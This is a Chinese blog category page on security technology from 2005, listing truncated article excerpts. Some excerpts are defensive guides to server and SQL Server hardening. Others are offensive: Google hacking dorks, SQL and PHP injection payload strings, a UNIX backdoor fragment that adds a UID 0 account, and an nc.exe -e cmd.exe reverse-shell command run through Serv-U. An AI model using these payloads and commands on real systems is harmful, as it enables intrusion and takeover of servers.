安全技术
文章平均质量分 74
szbenxu
这个作者很懒,什么都没留下…
展开
-
Google attack的利用
以后给出的形式是这样的,数字的后面跟的是要再google搜索的内容,后面跟着介绍和漏洞如何利用,由于本人时间有限制,所以就不翻译了,如果大家有兴趣的话自己翻译翻译吧.. 1.intitle:Login intext:"RT is ? Copyright" RT is an enterprise-grade ticketing system which enables a group o原创 2005-02-20 20:33:00 · 1662 阅读 · 0 评论 -
从上传webshell突破TCP/IP筛选到3389登陆
作者:lvhuana 来自:http://www.wrsky.com/日期:2004.12.11LvHuaNa一:得到webshell今天晚上的一次小小测试,由于本人太菜,再高深的技术我也不会,只能这样了..........一切都已经过去了,没有办法补图了,希望能看的懂这个小帖子。今天有是无聊的一天,晚上实在无聊没有事情干,就到一个视频聊天站点看秀,嘿嘿~突然发现一个聊天室特别的火暴,人数已原创 2005-02-20 20:41:00 · 881 阅读 · 0 评论 -
sql injection终极利用方法
————只要给我一个注射点,无论什么权限,我都给你一个webshell甚至系统权限原创:许文强(xwq),QQ:57133683声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。因为发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性仍然很大,所以请大家不要对国内的站点做任何具有破坏性的操作。考虑再三,偶还是决定发出来。此招手段歹毒,利用范围广泛,可以说是只要是有sql原创 2005-02-21 00:29:00 · 622 阅读 · 0 评论 -
Windows下权限设置详解
创建时间:2005-02-15mrcool (mrcoolfuyu@tom.com)随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。难道我们真的无能为力了吗?其实,只要你弄明白了NTFS系统下的权限设置问题,我们可以对crackers们说:NO!原创 2005-02-24 00:38:00 · 653 阅读 · 0 评论 -
哇!有黑客!!!(上)
作者:elly 来源:安全焦点论坛异象:昨夜西风凋碧树序幕:話説那日elly與衆人閒談完"黑客趨勢(趣事)"之後,獨自下樓喝茶去了。 鳳簫聲動,玉壺光轉,正恍惚閒,忽聞手機鈴聲。原是尋到一服務器,正在閒置,可為所用。於是登錄上去,稍做配置...PCAnywhere正在登录。方世玉的老妈的师兄经常说,安全第一,安全第一。上去之后,当然是先看看服务器的服务配置。运行"Services.msc"原创 2005-02-27 03:48:00 · 1314 阅读 · 0 评论 -
从IIS到SQL Server数据库安全
来源: 风闪网络学院从codered到nimda等,一大堆蠕虫把原来需要人工利用的漏洞都变成了程序自动利用了,大家还想去手工操作这些IIS漏洞么?让我们调整重心,去看看服务器常用的数据库吧。 一般网站都是基于数据库的,特别是ASP、PHP、JSP这样的用数据库来动态显示的网站。很多网站可能多注意的是操作系统的漏洞,但是对数据库和这些脚本的安全总是忽略,也没有太多注意。 从最比较普遍的原创 2005-03-01 07:30:00 · 837 阅读 · 0 评论 -
创建UNIX后门(初级篇,中级篇,高级篇)
作者:tiger初级篇 最简单的方法,就是在口令文件 passwd 中增加一个 UID 为 0 的帐号。但最好别这么做,因为只要系统管理员检查口令文件就会“漏馅”了。以下是在 /etc/passwd 口令文件中添加一个 UID 0 帐号的C程序。 backdoor/backdoor1.c #include main() { FILE *fd; fd=fopen("/etc/pass原创 2005-03-01 07:32:00 · 803 阅读 · 0 评论 -
PHP注射库
or 1=1 or 1=1 /* %23 and password=mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from admin id=1 u原创 2005-03-01 07:35:00 · 662 阅读 · 0 评论 -
SQL安全设置攻略
出处:NB联盟日前SQL INJECTION的攻击测试愈演愈烈,很多大型的网站和论坛都相继被注入。这些网站一般使用的多为SQL SERVER数据库,正因为如此,很多人开始怀疑SQL SERVER的安全性。其实SQL SERVER 2000已经通过了美国政府的C2级安全认证-这是该行业所能拥有的最高认证级别,所以使用SQL SERVER还是相当的安全的。当然和ORCAL、DB2等还是有差距,但是SQ原创 2005-03-03 18:25:00 · 688 阅读 · 0 评论 -
打造安全的2003个人Web服务器
Win2003 Server的安全性较之Win2K确实有了很大的提高,但是用Win2003 Server作为服务器是否就真的安全了?如何才能打造一个安全的个人Web服务器?下面我们简单介绍一下......一、Windows Server2003的安装 1、安装系统最少两需要个分区,分区格式都采用NTFS格式 2、在断开网络的情况安装好2003系统 3、安装IIS,仅安装必要的 IIS 组件(原创 2005-03-03 18:33:00 · 656 阅读 · 0 评论 -
防范WEB SHELL(整理文)
来源:http://fox.he100.com/做了1年时间的虚拟主机管理员,大概对NT下的WEB SHELL的防范也有一定的了解。现在通过整理一些高手的文章来说说如何防范WEBSHELL。常见的WEBSHELL也就是ASP,PHP,PERL,这些脚本写成的。市面上比较流行的WEBSHELL也就是海阳顶端网asp木马2005、桂林老兵的ASP站长助手(不知道算不算WEBSHELL,呵呵)、蓝屏AS原创 2005-03-09 02:44:00 · 1170 阅读 · 0 评论 -
如何使用IPSec 阻止特定网络协议和端口
来源:http://support.microsoft.com/概要Internet 协议安全 (IPSec) 筛选规则可用于帮助保护基于 Windows 2000 的计算机免遭病毒及蠕虫等威胁带来的、基于网络的攻击。本文介绍如何为入站和出站网络通信筛选特定的协议和端口组合。本文还包括用于确定当前是否为基于 Windows 2000 的计算机指定了 IPSec 策略的步骤、用于创原创 2005-02-27 03:52:00 · 1529 阅读 · 0 评论 -
哇!有黑客!!!(下)
作者:elly 来源:安全焦点论坛注意看前面打了*号的那些文件,说它们不是后门之类入侵者留下的文件我才不信。先随便打开一个最近修改过的(就在不久前)Svclog看看: 代码 ============================================================C:/WINNT/system32>type Svclog.logPerf原创 2005-02-27 03:50:00 · 2345 阅读 · 0 评论 -
信息安全的隐患-GoogleHacking原理和防范
作者:zhaohuan@phack.org 来源:www.phack.org技术天地:GoogleHacking是利用Google的搜索引擎快速查找存在脆弱性的主机以及包含敏感数据的信息,最近这种以前由黑客手动进行操作的攻击手段可以通过一种新的蠕虫病毒来自动完成。为了引起大家对GoogleHacking的关注与重视,我们编发了这篇文章希望大家通过对Hack的攻击手段的了解,更好的保护自己的信息原创 2005-02-20 20:39:00 · 720 阅读 · 0 评论 -
nc的说明及使用
netcat被誉为网络安全界的‘瑞士军刀,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具, 能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几 乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 在中国,它的WINDOWS版有两个原创 2005-02-20 20:44:00 · 869 阅读 · 0 评论 -
通过webshell获得admin全攻略
作者:稻草人 QQ:16285939话说到花了九牛二虎的力气获得了一个webshell,当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~嘻嘻~~好跟我来,看看有什么可以利用的来提升权限****************************************************************************第一如果服务器上有装了pc原创 2005-02-20 20:46:00 · 1302 阅读 · 0 评论 -
解除TCP/IP限制的小技巧
作者:河马史诗 http://www.wrsky.com1.用NC反弹得到一个shell本机监听 NC -l -p 32WEBSHELL运行:x:/xxx/serv-u.exe "x:/xxx/nc.exe -e cmd.exe *.*.*.* port"得到一个shell2.CMD下导出注册表文件C:/>regedit -e x:/xxx/1.reg HKEY_LOCA原创 2005-02-20 20:42:00 · 863 阅读 · 0 评论 -
Sql注射中参数多次调用Echo解决办法
来源:情感网络 作者:xiaolu 我是在黑哥Blog看到的他写的,先引用黑哥的:Quote: 文/superhei 解决办法: 1.iget.vbs一次写入 在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写 Set x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments原创 2005-02-20 20:51:00 · 836 阅读 · 0 评论 -
克隆帐户终结篇修正版
来源:岁月联盟 猪猪几句废话:黑基发了我的克隆帐户之终结篇后,很多朋友对我文章提出了宝贵意见.由于原文是自己无聊时随便写的,很多地方不够严谨.于是我重新整理了此文,补充了一些资料,修改了不够严谨的地方, 有问题欢迎来我blog上探讨.序:相信大家都用过克隆帐户吧。无论是用工具还是用手工,克隆帐户无疑是隐藏帐户的最好选择。但是看见网上的文章都讲的特别麻烦。这样那样的。其实克隆帐户很简单。就原创 2005-02-22 20:29:00 · 904 阅读 · 0 评论 -
Widnwos 2000 命令集合
accwiz.exe > Accessibility Wizard for walking you through setting up your machine for your mobility needs. 辅助工具向导 acsetups.exe > ACS setup DCOM server executable actmovie.exe > Direct Show setup tool原创 2005-02-23 05:03:00 · 504 阅读 · 0 评论 -
google hacking的实现以及应用
google hacking的实现以及应用(上)本文作者:sniper文章出于:www.4ngel.net日 期 : 05/01/26修改/发布: 05/02/21本文仅做于技术讨论于研究,请勿用做其他用途.PS:庆祝一下暂时摆脱应试教育的魔爪,向那些打着素质教育暗地里搞应试教育的学校竖起中指!前言 google hacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关原创 2005-02-24 00:31:00 · 835 阅读 · 0 评论 -
2004·网络安全圈
创建时间:2005-01-10root (webmaster_at_xfocus.org)2004·网络安全圈网络安全焦点走进2005,我们回头看看,一年来网络安全圈内的风风雨雨,哪些我们只是听了个响?哪些是我们真切地触摸和感受的?圈里圈外,安全已经完全融入我们的生活……一、网络安全圈·趋势1.1 更多网络犯罪直接以经济利益为目的最吸引国人眼球的应该是腾讯,2004年两次QQ大规模无法使用,尤其是原创 2005-02-24 01:14:00 · 1050 阅读 · 0 评论 -
SQL注射总结(一)
作者:岁月联盟 猪猪Sql注射总结(早源于or1=1) 最重要的表名:select * from sysobjectssysobjects ncsysobjectssysindexes tsysindexessyscolumnssystypessysuserssysdatabasessysxloginssysprocesses最重要的一些用户名(默认sql数据库中存在着的)pu原创 2005-02-27 02:15:00 · 739 阅读 · 0 评论 -
SQL注入法攻击一日通
出处:教主的BLOG此文章是对网上大量同类文章的分析与总结,并结合自己实施过程中的体会综合而成,其中有不少直接引用,没有注意出处,请原作者见谅)随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根 据程序返回原创 2005-02-27 02:20:00 · 1070 阅读 · 0 评论